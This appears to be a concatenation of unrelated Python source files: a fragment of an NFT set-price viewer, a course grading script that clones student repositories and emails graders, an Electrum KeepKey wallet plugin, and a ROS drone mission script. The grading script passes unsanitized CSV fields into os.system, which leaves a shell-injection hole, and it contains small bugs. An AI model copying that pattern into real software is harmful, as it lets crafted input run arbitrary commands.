self.logInfoCallback(f"Sets: no listing found for [{id}] {asset['name']} {asset['permalink']}")
missingPriceBySet[setName] = missingPriceEth
setPriceBySet[setName] = setPriceEth
for tokenId in tokensInSet:
# default is medium grey
color = (150,150,150)
if tokenId in ownedTokens:
# white
color = (255,255,255)
if tokenId in unavailableTokens:
# purple if you owned and unlisted!
color = (255,255,0)
if tokenId in unavailableTokens:
# red
color = (255,0,0)
# get the name of the card
token = str(tokenId)
if self.cards.Has(token):
text = self.cards.Get(token)['name']
else:
text = tokenId
card = self.cards.Get(token)
dpg.add_button(label="o", user_data=card['link'], callback=lambda _,__,url: webbrowser.open_new_tab(url))
dpg.add_same_line()
txt = dpg.add_text(default_value=text, color=color)
tt = dpg.add_tooltip(parent=txt)
dpg.add_text(default_value=f"[{tokenId}] {card['name']}", parent=tt, color=(212,175,55))
dpg.add_text(default_value=f"Properties:", parent=tt, color=(0,255,255))
for trait in self.cards.Get(token)['traits']:
dpg.add_text(default_value=f" {card['traits'][trait]}", parent=tt)
if tokenId in priceByToken:
missingTokenPrice = priceByToken[tokenId]
dpg.add_text(default_value="Current Token Price:", parent=tt, color=(0,255,255))
dpg.add_text(default_value=f" ETH {missingTokenPrice:0,.4f}", parent=tt)
dpg.add_text(default_value=f" USD ${missingTokenPrice * ethInFiat:0,.2f}", parent=tt)
dpg.add_text(default_value="Set Completion Costs:", parent=tt, color=(0,255,255))
dpg.add_text(default_value=f" ETH {missingPriceEth:0,.4f}", parent=tt)
dpg.add_text(default_value=f" USD ${(missingPriceEth * ethInFiat):0,.2f}", parent=tt)
dpg.add_text(default_value="Full Set Cost (Lowest Listings):", parent=tt, color=(0,255,255))
dpg.add_text(default_value=f" ETH {setPriceEth:0,.4f}", parent=tt)
dpg.add_text(default_value=f" USD ${(setPriceEth * ethInFiat):0,.2f}", parent=tt)
if unavailableTokens:
dpg.add_text(default_value="Unavailable Tokens:", parent=tt, color=(255,0,0))
for t in unavailableTokens:
dpg.add_text(default_value=f" {self.cards.Get(str(t))['name']}", parent=tt, color=(255,0,0))
dpg.add_table_next_column()
|
verification.py | import datetime
from email.mime.text import MIMEText
import csv
import smtplib
from optparse import OptionParser
import os
from Queue import Queue
from threading import Thread
def eliminate_duplicates(csv_file, eid_index, time_index):
student_dict = {}
for csv_line in csv:
eid = csv_line[eid_index]
dt = csv_line[time_index]
date, time = dt.split()
mon, day, year = [int(i) for i in date.split('/')]
hour, minute, second = [int(i) for i in time.split(':')]
sub_time = datetime.datetime(year, mon, day, hour, minute, second)
if eid not in student_dict:
student_dict[eid] = {}
student_dict[eid]['csv_line'] = csv_line
student_dict[eid]['datetime'] = sub_time
else:
if student_dict[eid]['datetime'] < sub_time:
student_dict[eid]['csv_line'] = csv_line
student_dict[eid]['datetime'] = sub_time
student_csvs = []
for eid in student_dict:
student_csvs.append(student_dict[eid]['csv_line'])
return student_csvs
def pull(csvLine, uteid_index, url_index, sha_index):
os.system('mkdir ' + csvLine[uteid_index] + ';' +
'cd ' + csvLine[uteid_index] + ';' +
'git init;' +
'git remote add origin ' + csvLine[url_index] + ';' +
'git pull;' +
'git checkout ' + csvLine[sha_index] + ';')
return csvLine
def check(files, direct):
res = []
for f in files:
if not os.path.exists(direct + '/' + f):
res.append(f + ' does not exist')
return res
def email(email, password, smtpServer, to, cc, subject, eid, msg):
message = "From: " + email + "\nTo: " + to + "\nCC: "
for i in range(len(cc)-1):
message += cc[i] + ','
message += cc[len(cc)-1] + \
'\nSubject:' + '[CS371p] ' + subject + '\n\n'
message += 'This is an automated message, please contact the graders if you have questions.\n\n'
message += 'EID: ' + eid + '\n'
for m in msg:
message += m + '\n'
message += '\nPlease push these files to your repo and notify the graders ASAP.\n\nCS371p Graders'
smtp = smtplib.SMTP(smtpServer)
smtp.starttls()
smtp.login(email, password)
smtp.sendmail(email, [to] + [cc], message)
smtp.quit()
if __name__=='__main__':
csvq = Queue()
dirq = Queue()
probq = Queue()
outputq = Queue()
parser = OptionParser()
parser.add_option('-f', dest='csv_file', help='csv file to be read')
parser.add_option('-u', dest='user', help='email address')
parser.add_option('-p', dest='passw', help='email password')
parser.add_option('--smtp', dest='smtp', help='smtp server')
parser.add_option('--cc', dest='cc', help='email cc\'s')
parser.add_option('--files', dest='files', help='required files')
parser.add_option('--csv_time', dest='csv_time', help='csv time column index')
parser.add_option('--csv_eid', dest='csv_eid', help='csv eid column index')
parser.add_option('--csv_email', dest='csv_email', help='csv email column index')
parser.add_option('--csv_url', dest='csv_url', help='csv url column index')
parser.add_option('--csv_sha', dest='csv_sha', help='csv sha column index')
(option, args) = parser.parse_args()
csv_file_name = option.csv_file
email_addr = option.user
password = option.passw
smtp = option.smtp
subject = 'Missing files'
cc = option.cc.split(',')
files = option.files.split(',')
csv_time = int(option.csv_time)
csv_eid = int(option.csv_eid)
csv_email = int(option.csv_email)
csv_url = int(option.csv_url)
csv_sha = int(option.csv_sha)
print 'option list:', parser.option_list
print 'Csv file:', csv_file_name
print 'Email sending:', email_addr
print 'CC\'d:', cc
print 'Smtp server:', smtp
print 'Required files:', files
print 'Index of time:', csv_time
print 'Index of eid:', csv_eid
print 'Index of email:', csv_email
print 'Index of project url:', csv_url
print 'Index of sha:', csv_sha
# read in all of the lines of the csv
clean_csv = []
with open(csv_file_name, "rb") as csv_file:
csv = csv.reader(csv_file, delimiter=",")
clean_csv = eliminate_duplicates(csv, csv_eid, csv_time)
# put all of the clean lines into the first queue
END = '______________NO_MORE_LINES'
for line in clean_csv:
csvq.put(line)
csvq.put(END)
# wrapper for pulling the projects
def pull_projects():
run = True
while run:
csv_line = csvq.get()
if csv_line != END:
out_val = pull(csv_line, csv_eid, csv_url, csv_sha)
dirq.put(out_val)
else:
dirq.put(END)
run = False
csvq.task_done()
# wrapper for checking the projects
def check_files():
run = True
while run:
csv_line = dirq.get()
if csv_line != END:
direct = csv_line[csv_eid]
message = check(files, direct)
if len(message) > 0:
probq.put((csv_line, message))
outputq.put((csv_line, message))
else:
outputq.put((csv_line, ['OK to grade']))
else:
run = False
probq.put(END)
outputq.put(END)
dirq.task_done()
# wrapper for emailing the projects
def email_missing():
run = True
while run:
in_val = probq.get()
if in_val != END:
csv_line, message = in_val
email(email_addr, password, smtp, csv_line[csv_email], cc, subject, csv_line[csv_eid], message)
else:
run = False
probq.task_done()
f = open('validation_results.csv', 'wb')
def write():
run = True
while run:
in_val = outputq.get()
if in_val != END:
csv_line, message = in_val
output_string = csv_line[csv_time] + ',' + csv_line[csv_eid] + ','
for m in message:
output_string += m + ';'
output_string += ', ' + csv_line[csv_url] + ',' + csv_line[csv_sha] + '\n'
f.write(output_string)
print output_string
else:
run = False
outputq.task_done()
pulling_thread1 = Thread(target = pull_projects)
checking_thread = Thread(target = check_files)
emailing_thread = Thread(target = email_missing)
output_thread = Thread(target = write)
pulling_thread1.start()
checking_thread.start()
emailing_thread.start()
output_thread.start()
pulling_thread1.join()
checking_thread.join()
emailing_thread.join()
output_thread.join()
f.close()
print "done"
|
keepkey.py | from binascii import hexlify, unhexlify
import traceback
import sys
from electrum.util import bfh, bh2u, UserCancelled, UserFacingException
from electrum.bitcoin import TYPE_ADDRESS, TYPE_SCRIPT
from electrum.bip32 import BIP32Node
from electrum import constants
from electrum.i18n import _
from electrum.transaction import deserialize, Transaction
from electrum.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class KeepKey_KeyStore(Hardware_KeyStore):
hw_type = 'keepkey'
device = 'KeepKey'
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None and not Transaction.is_segwit_input(txin):
raise UserFacingException(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class KeepKeyPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types, HidTransport
firmware_URL = 'https://www.keepkey.com'
libraries_URL = 'https://github.com/keepkey/python-keepkey'
minimum_firmware = (1, 0, 0)
keystore_class = KeepKey_KeyStore
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
try:
from . import client
import keepkeylib
import keepkeylib.ckd_public
import keepkeylib.transport_hid
import keepkeylib.transport_webusb
self.client_class = client.KeepKeyClient
self.ckd_public = keepkeylib.ckd_public
self.types = keepkeylib.client.types
self.DEVICE_IDS = (keepkeylib.transport_hid.DEVICE_IDS +
keepkeylib.transport_webusb.DEVICE_IDS)
self.device_manager().register_devices(self.DEVICE_IDS)
self.libraries_available = True
except ImportError:
self.libraries_available = False
def hid_transport(self, pair):
from keepkeylib.transport_hid import HidTransport
return HidTransport(pair)
def webusb_transport(self, device):
from keepkeylib.transport_webusb import WebUsbTransport
for d in WebUsbTransport.enumerate():
if device.id_.startswith(d.getSerialNumber()):
return WebUsbTransport(d)
return WebUsbTransport(device)
def _try_hid(self, device):
self.logger.info("Trying to connect over USB...")
if device.interface_number == 1:
pair = [None, device.path]
else:
pair = [device.path, None]
try:
return self.hid_transport(pair)
except BaseException as e:
# see fdb810ba622dc7dbe1259cbafb5b28e19d2ab114
# raise
self.logger.info(f"cannot connect at {device.path} {e}")
return None
def _try_webusb(self, device):
self.logger.info("Trying to connect over WebUSB...")
try:
return self.webusb_transport(device)
except BaseException as e:
self.logger.info(f"cannot connect at {device.path} {e}")
return None
def create_client(self, device, handler):
if device.product_key[1] == 2:
transport = self._try_webusb(device)
else:
transport = self._try_hid(device)
if not transport:
self.logger.info("cannot connect to device")
return
self.logger.info(f"connected to device at {device.path}")
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.logger.info(f"ping failed {e}")
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.logger.info(msg)
if handler:
handler.show_error(msg)
else:
raise UserFacingException(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Fujicoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, self.device)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
self.logger.exception('')
handler.show_error(str(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if not client:
raise Exception(_("The device was disconnected."))
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
bip32node = BIP32Node.from_xkey(xpub)
node = self.types.HDNodeType(
depth=bip32node.depth,
fingerprint=int.from_bytes(bip32node.fingerprint, 'big'),
child_num=int.from_bytes(bip32node.child_number, 'big'),
chain_code=bip32node.chaincode,
public_key=bip32node.eckey.get_public_key_bytes(compressed=True),
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise UserFacingException(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_keepkey_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_keepkey_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs,
lock_time=tx.locktime, version=tx.version)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 3):
keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
xpubs = wallet.get_master_public_keys()
if len(xpubs) == 1:
script_type = self.get_keepkey_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
else:
def f(xpub):
return self._make_node_path(xpub, [change, index])
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
pubkeys = list(map(f, sorted_xpubs))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * wallet.n,
m=wallet.m,
)
script_type = self.get_keepkey_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
txinputtype.script_type = self.get_keepkey_input_script_type(txin['type'])
else:
def f(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
return self._make_node_path(xpub, s)
pubkeys = list(map(f, x_pubkeys))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures')),
m=txin.get('num_sig'),
)
script_type = self.get_keepkey_input_script_type(txin['type'])
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx):
def create_output_by_derivation():
script_type = self.get_keepkey_output_script_type(info.script_type)
if len(xpubs) == 1:
address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
txoutputtype = self.types.TxOutputType(
amount=amount,
script_type=script_type,
address_n=address_n,
)
else:
address_n = self.client_class.expand_path("/%d/%d" % index)
pubkeys = [self._make_node_path(xpub, address_n) for xpub in xpubs]
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=amount,
address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(o)
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = self.types.PAYTOADDRESS
txoutputtype.address = address
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for o in tx.outputs():
_type, address, amount = o.type, o.address, o.value
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info.address_index, info.sorted_xpubs, info.num_sig
on_change_branch = index[0] == 1
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
if on_change_branch == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t.inputs.extend(inputs)
for vout in d['outputs']:
o = t.bin_outputs.add()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
full_task.py | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# Импорт библиотек
import math
import time
import cv2
import numpy as np
import rospy
import tf
try:
from clover import srv
except:
from clever import srv
from std_srvs.srv import Trigger
from mavros_msgs.srv import CommandBool
from sensor_msgs.msg import Image
from std_msgs.msg import String
from pyzbar import pyzbar
from cv_bridge import CvBridge
import sys
import threading
import os
from mavros_msgs.srv import CommandBool
arming = rospy.ServiceProxy('mavros/cmd/arming', CommandBool)
# sys.path.append('/home/dmitrii/catkin_ws/src/ior2020_uav_L22_AERO')
sys.path.append('/home/pi/catkin_ws/src/ior2020_uav_L22_AERO')
from l22_aero_vision.msg import ColorMarker
from l22_aero_vision.msg import ColorMarkerArray
from l22_aero_vision.src.tools.tf_tools import *
import l22_aero_vision.srv
Z_TOL = 0.5
TOLERANCE_COORDS = 0.4 #in meters
COORDS_UPDATE_RATE = 1
# ARUCO_TELEM_RATE = 5
# Словари для координат
coordinates = {
'water': [],
'pastures': [],
'seed': [],
'potato': [],
'soil': [],
'water_land': [],
'seed_land': [],
'pastures_land': []
}
type_mapping = {
'blue': 'water',
'green': 'pastures',
'yellow': 'seed',
'red': 'potato',
'brown': 'soil'
}
circle_type_mapping = {
'seed': 'seed_land',
'pastures': 'pastures_land',
'water': 'water_land',
'blue': 'water_land',
'green': 'pastures_land',
'yellow': 'seed_land'
}
rospy.init_node('flight')
# создаем объекты прокси сервисов
get_telemetry = rospy.ServiceProxy('get_telemetry', srv.GetTelemetry)
navigate = rospy.ServiceProxy('navigate', srv.Navigate)
navigate_global = rospy.ServiceProxy('navigate_global', srv.NavigateGlobal)
set_position = rospy.ServiceProxy('set_position', srv.SetPosition)
set_velocity = rospy.ServiceProxy('set_velocity', srv.SetVelocity)
set_attitude = rospy.ServiceProxy('set_attitude', srv.SetAttitude)
set_rates = rospy.ServiceProxy('set_rates', srv.SetRates)
land_serv = rospy.ServiceProxy('land', Trigger)
arming = rospy.ServiceProxy('mavros/cmd/arming', CommandBool)
v_set_parametrs = rospy.ServiceProxy('/l22_aero_color/set_parametrs', l22_aero_vision.srv.SetParameters)
nav_broadcaster = tf.TransformBroadcaster()
# tf_buffer = tf2_ros.Buffer()
# tf_listener = tf2_ros.TransformListener(tf_buffer)
listener = tf.TransformListener()
#####
Z = 0
def navigate_aruco(x=0, y=0, z=0, yaw=float('nan'), speed=0.4, floor=False):
'''
Фукнция для полета до точки без ожидания долета до нее
'''
return navigate(x=x, y=y, z=z, yaw=yaw, speed=speed, frame_id='aruco_map')
def get_telemetry_aruco():
'''
Функция для получения телеметрии
'''
telem = get_telemetry(frame_id="aruco_map")
# Z = telem.z
return telem
def takeoff(z):
'''
Функция для взлета
'''
telem = get_telemetry_aruco()
navigate(z=z, speed=0.3, frame_id="body", auto_arm=True)
rospy.sleep(2)
navigate_aruco(x=telem.x, y=telem.y, z=z, speed=0.4, floor=True)
def navigate_wait(x, y, z, yaw=float('nan'), speed=0.2, tolerance=0.13):
'''
Фукнция для полета до точки с ожиданием долета до нее
'''
navigate_aruco(x=x, y=y, z=z, yaw=yaw, speed=speed)
while not rospy.is_shutdown():
telem = get_telemetry(frame_id="navigate_target")
# print(telem.x, telem.y, telem.z)
if math.sqrt(telem.x ** 2 + telem.y ** 2 + telem.z ** 2) < tolerance:
break
rospy.sleep(0.2)
def land():
'''
Фунцкия для посадки
'''
land_serv()
rospy.sleep(0.79)
arming(False)
class ColorMarkerMap:
def __init__(self, cx_map=0, cy_map=0, cz_map=0, cx_img=0, cy_img=0, color="none", cx_cam=0, cy_cam=0, cz_cam=0):
self.cx_map = cx_map
self.cy_map = cy_map
self.cz_map = cz_map
self.cx_cam = cx_cam
self.cy_cam = cy_cam
self.cz_cam = cz_cam
self.cx_img = cx_img
self.cy_img = cy_img
self.color = color
def __str__(self):
return "color: {}\n coords map: {} {} {}".format(self.color, str(self.cx_map), str(self.cy_map), str(self.cz_map))
class Recognition:
def __init__(self):
'''
Инициализация переменных
Создание подписчика топика main_camera/image_raw_throttled, который отправляет его в image_callback()
Создание топика, который публикует изображение
'''
self.barcodeData = None
self.bridge = CvBridge()
self.cv_image = np.zeros((240, 320, 3), dtype="uint8")
self.image_sub = rospy.Subscriber('image_raw', Image, self.image_callback)
self.qr_pub = rospy.Publisher('/qr_debug', Image, queue_size=1)
self.coords_sub = rospy.Subscriber("/l22_aero_color/markers", ColorMarkerArray, self.markers_arr_clb)
self.circles_sub = rospy.Subscriber("/l22_aero_color/circles", ColorMarkerArray, self.circles_arr_clb)
self.result = []
self.circles = []
self.coords_thread = threading.Thread(target=self.coords_thread_func)
self.coords_thread.daemon = True
# self.coords_thread.start()
def transform_marker(self, marker, frame_to="aruco_map"):# -> ColorMarkerMap:
cx_map = 0
cy_map = 0
cz_map = 0
try:
cx_map, cy_map, cz_map, _ = transform_xyz_yaw(
marker.cx_cam, marker.cy_cam, marker.cz_cam, 0, "main_camera_optical", frame_to, listener)
except (tf.LookupException, tf.ConnectivityException):
print("TF error")
return ColorMarkerMap(color=marker.color, cx_map=cx_map, cy_map=cy_map, cz_map=cz_map,
cx_cam=marker.cx_cam, cy_cam=marker.cy_cam, cz_cam=marker.cz_cam)
def markers_arr_clb(self, msg):
'''
Функция для парсинга координат цветных маркеров
'''
# self.result = []
for marker in msg.markers:
self.result.append(self.transform_marker(marker, frame_to="aruco_map"))
def circles_arr_clb(self, msg):
'''
Функция для парсинга координат точек для посадки из топика
'''
# self.circles = []
for marker in msg.markers:
self.circles.append(self.transform_marker(marker, frame_to="aruco_map"))
def image_callback(self, data):
'''
Функция для парсинга изображения из топика
'''
self.cv_image = cv2.resize(self.bridge.imgmsg_to_cv2(data, 'bgr8'), (320, 240))
def most_frequent(self, arr):
'''
Функция для определения значения, который встречается наибольшее количество раз в массиве
'''
return max(set(arr), key = arr.count)
def distance(self, coord1, coord2):
'''
Функция для определения евклидова расстояния
'''
return ((coord1[0] - coord2[0])**2 + (coord1[1] - coord2[1])**2)**0.5
def average(self, coord1, coord2):
'''
Функция для определения средней точки
'''
return ((coord1[0] + coord2[0])/2, (coord1[1] + coord2[1])/2)
def coordsFunc(self):
# global Z
'''
Функция для усреднения координат цветных маркеров
'''
global coordinates
# Z = get_telemetry_aruco().z
for i in range(len(self.result)):
if self.result[i].color not in coordinates:
color = type_mapping[self.result[i].color]
else:
color = self.result[i].color
# if (self.result[i].cz_map - Z) < Z_TOL:
tempCoords = (self.result[i].cx_map, self.result[i].cy_map)
if tempCoords[0] < -1.5 or tempCoords[1] < -1.5: continue
if len(coordinates[color]) == 0:
coordinates[color].append(np.array([np.array(tempCoords)]))
else:
for j in range(len(coordinates[color])):
# print(coordinates[color][j].mean(axis=0), tempCoords, "arr", coordinates[color][j])
if self.distance(coordinates[color][j].mean(axis=0), tempCoords) <= TOLERANCE_COORDS:
coordinates[color][j] = np.append(coordinates[color][j], np.array([tempCoords]), axis=0)
break
else:
coordinates[color].append(np.array([np.array(tempCoords)]))
self.result = []
for i in range(len(self.circles)):
if self.circles[i].color not in coordinates:
color = circle_type_mapping[self.circles[i].color]
else:
color = self.circles[i].color
tempCoords = [self.circles[i].cx_map, self.circles[i].cy_map]#####################################
if tempCoords[0] < -1 or tempCoords[1] < -1: continue #DELETE IF NEEDED!
if len(coordinates[color]) == 0:
coordinates[color].append(np.array([np.array(tempCoords)]))##################################################
else:
for j in range(len(coordinates[color])):
if self.distance(coordinates[color][j].mean(axis=0), tempCoords) <= TOLERANCE_COORDS:
# coordinates[color][j] = list(self.average(tempCoords, coordinates[color][j])) + [coordinates[color][j][2] + 1] ################################
coordinates[color][j] = np.append(coordinates[color][j], np.array([tempCoords]), axis=0)
break
else:
coordinates[color].append(np.array([np.array(tempCoords)]))######coordinates[color].append(list(tempCoords) + [1]) #########################################################
self.circles = []
def coords_thread_func(self):
r = rospy.Rate(COORDS_UPDATE_RATE)
while True:
self.coordsFunc()
r.sleep()
def waitDataQR(self):
'''
Функция для распознавания QR-кодов
'''
gray = cv2.cvtColor(self.cv_image, cv2.COLOR_BGR2GRAY)
barcodes = pyzbar.decode(gray)
for barcode in barcodes:
(x, y, w, h) = barcode.rect
self.barcodeData = barcode.data.decode("utf-8")
xc = x + w/2
yc = y + h/2
self.cv_image = cv2.circle(self.cv_image, (int(xc), int(yc)), 15, (0, 0, 0), 30)
self.qr_pub.publish(self.bridge.cv2_to_imgmsg(self.cv_image, 'bgr8'))
return self.barcodeData
# Создание объекта класса для распознавания
rc = Recognition()
z = 1.5
FIELD_LENGTH_X = 2.83 #in meters
